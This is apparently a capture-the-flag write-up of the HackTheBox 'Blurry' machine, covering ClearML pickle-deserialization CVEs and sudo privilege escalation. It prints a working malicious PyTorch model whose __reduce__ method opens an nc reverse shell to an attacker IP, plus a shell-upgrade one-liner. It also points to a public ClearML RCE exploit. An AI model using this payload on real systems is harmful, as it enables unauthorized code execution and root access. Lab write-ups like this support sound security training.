Quick note: This post is not a detailed walkthrough of the box. The box is currently active.
This post will share my exploration of the HTB Medium Machine "Blurry".
Enumeration
As always, I began with nmap and found an open http server.
The server seems to be running ssh and a web application (app.blurry.htb). We could go further into enumerating subdomains but it seems the web application is most probably exploitable so lets explore.
I found a clearML web application. My research found that it is a platform used to build machine learning solutions. We can submit any name and create projects as a developer. In setup we need to remember to add 2 subdomains, api.blurry.htb and files.blurry.htb to /etc/hosts file.
We can then we execute clearml-init and paste the configuration information we get from the experiment creation.
After searching for vulnerabilities, we find that there are a few that might be interesting. https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/
- CVE-2024–24590: Pickle Load on Artifact Get
- CVE-2024–24591: Path Traversal on File Download
- CVE-2024–24592: Improper Auth Leading to Arbitrary Read-Write Access
- CVE-2024–24593: Cross-Site Request Forgery in ClearML Server
- CVE-2024–24594: Web Server Renders User HTML Leading to XSS
- CVE-2024–24595: Credentials Stored in Plaintext in MongoDB Instance
Initial Foothold
We aim to get a reverse shell, so we will use CVE-2024–24590. This vulnerability allows an attacker to create a Pickle file that contains shell code, upload it as an artifact to the project and whenever the file is loaded the shell code will be executed.
A good up-to-date exploit can be found on github https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit. Start nc listener and wait for the shell.
After we execute the exploit, it should take a couple of seconds and then we have a shell.
Upgrade our shell to an interactive shell.
python3 -c 'import pty;pty.spawn("/bin/bash")’
We have the user flag and are logged in as jippity.
If possible, we should get the ssh key and just ssh into the box.
Privilege Escalation
Running sudo -l shows us that:
User jippity may run the following commands on blurry: (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth
We can see that evaluate_model is a script that searches for files that end with .pth in the models directory and removes malicious information and then runs it. We need to create a model that somehow runs a reverse shell and since its being run as sudo, we will get root.
I found this python script online that creates a model which is pretty much a blank model.
When someone tries to serialize (save) or deserialize (load) this model, the __reduce__ method will be called, and the command will be executed.
Documentation of the PyTorch library can be found here https://pytorch.org/docs/stable/index.html.
import torch
import torch.nn as nn
import os
class MaliciousModel(nn.Module):
def __init__(self):
super(MaliciousModel, self).__init__()
self.dense = nn.Linear(10, 1)
def forward(self, testing):
return self.dense(testing)
def __reduce__(self):
cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.18 4443 >/tmp/f"
return os.system, (cmd,)
malicious_model = MaliciousModel()
torch.save(malicious_model, 'testing.pth')After starting a nc listener on port 4443 on our attacker vm, and executing the "evaluate_model" script on the model as sudo:
We have access to a root shell.